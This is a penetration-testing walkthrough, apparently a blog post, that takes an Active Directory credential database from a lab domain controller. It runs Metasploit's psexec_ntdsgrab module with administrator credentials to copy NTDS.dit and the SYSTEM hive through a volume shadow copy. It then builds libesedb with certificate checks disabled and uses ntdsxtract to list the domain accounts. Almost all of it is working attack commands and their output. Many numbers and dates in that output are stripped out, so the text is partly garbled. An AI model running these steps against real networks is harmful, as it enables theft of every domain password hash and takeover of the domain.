psexec_ntdsgrab
msf auxiliary(psexec_ntdsgrab) > show options
Module options (auxiliary/admin/smb/psexec_ntdsgrab):
Name Current Setting Required Description
---- --------------- -------- -----------
CREATE_NEW_VSC false no If true, attempts to create a volume shadow copy
RHOST yes The target address
RPORT yes Set the SMB service port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SMBDomain PENTEST.COM no The Windows domain to use for authentication
SMBPass pass1234PASS~ no The password for the specified username
SMBSHARE C$ yes The name of a writeable share on the server
SMBUser administrator no The username to authenticate as
VSCPATH no The path to the target Volume Shadow Copy
WINPATH Windows yes The name of the Windows directory (examples: WINDOWS, WINNT)
msf auxiliary(psexec_ntdsgrab) > run
[*] : - Checking if a Volume Shadow Copy exists already.
[+] : - Service start timed out, OK if running a command or non-service executable...
[+] : - Volume Shadow Copy exists on \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
[+] : - Service start timed out, OK if running a command or non-service executable...
[*] : - Checking if NTDS.dit was copied.
[+] : - Service start timed out, OK if running a command or non-service executable...
[+] : - Service start timed out, OK if running a command or non-service executable...
[*] : - Downloading ntds.dit file
[+] : - ntds.dit stored at /home/notfound/.msf4/loot/_default_192_psexec.ntdsgrab._865816.dit
[*] : - Downloading SYSTEM hive file
[+] : - SYSTEM hive stored at /home/notfound/.msf4/loot/_default_192_psexec.ntdsgrab._928081.bin
[*] : - Executing cleanup...
[*] : - Cleanup was successful
[*] Auxiliary module execution completed
Install libesedb
root:/ /# uname -a
Linux kali -kali1--pae #1 SMP Debian 3.14.5-1kali1 (2014-06-07) i686 GNU/Linux
root:/tmp/ntds /# wget --no-check-certificate https://github.com/libyal/libesedb/archive/20150409.zip
root:/tmp/ntds /# unzip -x 20150409.zip
root:/tmp/ntds /# cd libesedb-20150409/
root:/tmp/ntds /# ./synclibs.sh
root:/tmp/ntds /# git config --global http.sslverify false
root:/tmp/ntds /# ./autogen.sh
root:/tmp/ntds /# ./configure
root:/tmp/ntds /# make
root:/tmp/ntds /# make install
root:/tmp/ntds /# esedbexport _default_192_psexec.ntdsgrab._865816.dit
esedbexport: error while loading shared libraries: libesedb.so: cannot open shared object file: No such file or directory
root:/tmp/ntds /# ldconfig
root:/tmp/ntds /# esedbexport _default_192_psexec.ntdsgrab._865816.dit
esedbexport
Opening file.
Exporting table (MSysObjects) out of
Exporting table (MSysObjectsShadow) out of
Exporting table (MSysUnicodeFixupVer2) out of
Exporting table (datatable) out of
Exporting table (hiddentable) out of
Exporting table (link_table) out of
Exporting table (sdpropcounttable) out of
Exporting table (sdproptable) out of
Exporting table (sd_table) out of
Exporting table (MSysDefrag1) out of
Exporting table (quota_table) out of
Exporting table (quota_rebuild_progress_table) out of
Export completed.
root:/tmp/ntds/ntds_demo /# ls -l
total
-rw-r--r-- 1 root root 12599296 Sep 12 12:48 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
-rw-r--r-- 1 root root 9773056 Sep 12 12:35 20150911101930_default_192.168.10.32_psexec.ntdsgrab._928081.bin
-rw-r--r-- 1 root root 1104 Sep 12 12:50 backlinks.map
-rw-r--r-- 1 root root 72779 Sep 12 12:50 childsrid.map
-rw-r--r-- 1 root root 11021285 Sep 12 12:39 datatable.3
-rw-r--r-- 1 root root 613 Sep 12 12:39 hiddentable.4
-rw-r--r-- 1 root root 42735 Sep 12 12:50 lidrid.map
-rw-r--r-- 1 root root 1013 Sep 12 12:50 links.map
-rw-r--r-- 1 root root 5777 Sep 12 12:39 link_table.5
-rw-r--r-- 1 root root 57 Sep 12 12:39 MSysDefrag1.9
-rw-r--r-- 1 root root 69512 Sep 12 12:38 MSysObjects.0
-rw-r--r-- 1 root root 69512 Sep 12 12:38 MSysObjectsShadow.1
-rw-r--r-- 1 root root 103 Sep 12 12:38 MSysUnicodeFixupVer2.2
drwxr-xr-x root root Sep : ntdsxtract
-rw-r--r-- 1 root root 57725 Sep 12 12:50 offlid.map
-rw-r--r-- 1 root root 152 Sep 12 12:50 pek.map
-rw-r--r-- 1 root root 80 Sep 12 12:39 quota_rebuild_progress_table.11
-rw-r--r-- 1 root root 771 Sep 12 12:39 quota_table.10
-rw-r--r-- 1 root root 180963 Sep 12 12:50 ridguid.map
-rw-r--r-- 1 root root 75646 Sep 12 12:50 ridname.map
-rw-r--r-- 1 root root 3583 Sep 12 12:50 ridsid.map
-rw-r--r-- 1 root root 23677 Sep 12 12:50 ridtype.map
-rw-r--r-- 1 root root 14 Sep 12 12:39 sdpropcounttable.6
-rw-r--r-- 1 root root 96 Sep 12 12:39 sdproptable.7
-rw-r--r-- 1 root root 182041 Sep 12 12:39 sd_table.8
-rw-r--r-- 1 root root 50885 Sep 12 12:50 typeidname.map
-rw-r--r-- 1 root root 67338 Sep 12 12:50 typerid.map
root:/tmp/ntds/ntds_demo /#
NTDSXTRACT
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dscomputers.py datatable.3 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsgroups.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsfileinformation.py 20150911101928_default_192.168.10.32_psexec.ntdsgrab._865816.dit
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
root:/tmp/ntds/ntds_demo /# python ./ntdsxtract/dsusers.py datatable.3 link_table.5 ./
[+] Started at: Sat, Sep :: UTC
[+] Started with options:
[+] Initialising engine...
[+] Loading saved map files (Stage )...
[!] Warning: Opening saved maps failed: [Errno ] No such file or directory: '/tmp/ntds/ntds_demo/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - % -> records processed
[+] Sanity checks...
Schema record id:
Schema type id:
[+] Extracting schema information - % -> records processed
[+] Loading saved map files (Stage )...
[!] Warning: Opening saved maps failed: [Errno ] No such file or directory: '/tmp/ntds/ntds_demo/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:
==============
Record ID:
User name: Administrator
User principal name:
SAM Account name: Administrator
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: b36f08b-c8cf-eab--ae1bdce0e4f6
SID: S-------
When created: -- ::+:
When changed: -- ::+:
Account expires: Never
Password last set: -- ::+:
Last logon: -- ::+:
Last logon timestamp: -- ::+:
Bad password time -- ::+:
Logon count:
Bad password count:
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, Administrator
Record ID:
User name: Guest
User principal name:
SAM Account name: Guest
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: d3b8bbf-d0a--fa-ecdf0d68b2b9
SID: S-------
When created: -- ::+:
When changed: -- ::+:
Account expires: Never
Password last set: Never
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count:
Bad password count:
Dial-In access perm: Controlled by policy
User Account Control:
ACCOUNTDISABLE
PWD_NOTREQD
NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, Guest
Record ID:
User name: krbtgt
User principal name:
SAM Account name: krbtgt
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: d4a001b1-d6f---b50ed442416
SID: S-------
When created: -- ::+:
When changed: -- ::+:
Account expires: Never
Password last set: -- ::+:
Last logon: Never
Last logon timestamp: Never
Bad password time Never
Logon count:
Bad password count:
Dial-In access perm: Controlled by policy
User Account Control:
ACCOUNTDISABLE
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, krbtgt
Record ID:
User name: python
User principal name:
SAM Account name: python
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: ---a98b-c9c797769ebc
SID: S-------
When created: -- ::+:
When changed: -- ::+:
Account expires: Never
Password last set: -- ::+:
Last logon: -- ::+:
Last logon timestamp: -- ::+:
Bad password time -- ::+:
Logon count:
Bad password count:
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, python
Record ID:
User name: juzi
User principal name:
SAM Account name: juzi
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: b29311a1-a-a8c-a292-f623ad2969b
SID: S-------
When created: -- ::+:
When changed: -- ::+:
Account expires: Never
Password last set: -- ::+:
Last logon: -- ::+:
Last logon timestamp: -- ::+:
Bad password time -- ::+:
Logon count:
Bad password count:
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, juzi
Record ID:
User name: jin
User principal name:
SAM Account name: jin
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: b53357-d35c--a239-cd930497bf7a
SID: S-------
When created: -- ::+:
When changed: -- ::+:
Account expires: Never
Password last set: -- ::+:
Last logon: -- ::+:
Last logon timestamp: -- ::+:
Bad password time Never
Logon count:
Bad password count:
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, jin
Record ID:
User name: debug
User principal name:
SAM Account name: debug
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: da9cb--ec8-b2b1-b2505521db
SID: S-------
When created: -- ::+:
When changed: -- ::+:
Account expires: Never
Password last set: -- ::+:
Last logon: -- ::+:
Last logon timestamp: -- ::+:
Bad password time Never
Logon count:
Bad password count:
Dial-In access perm: Controlled by policy
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$, COM, PENTEST, Users, debug
References
http://www.ntdsxtract.com/
https://github.com/libyal/libesedb/
![REDIS - Export File / Read File / Cracker[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)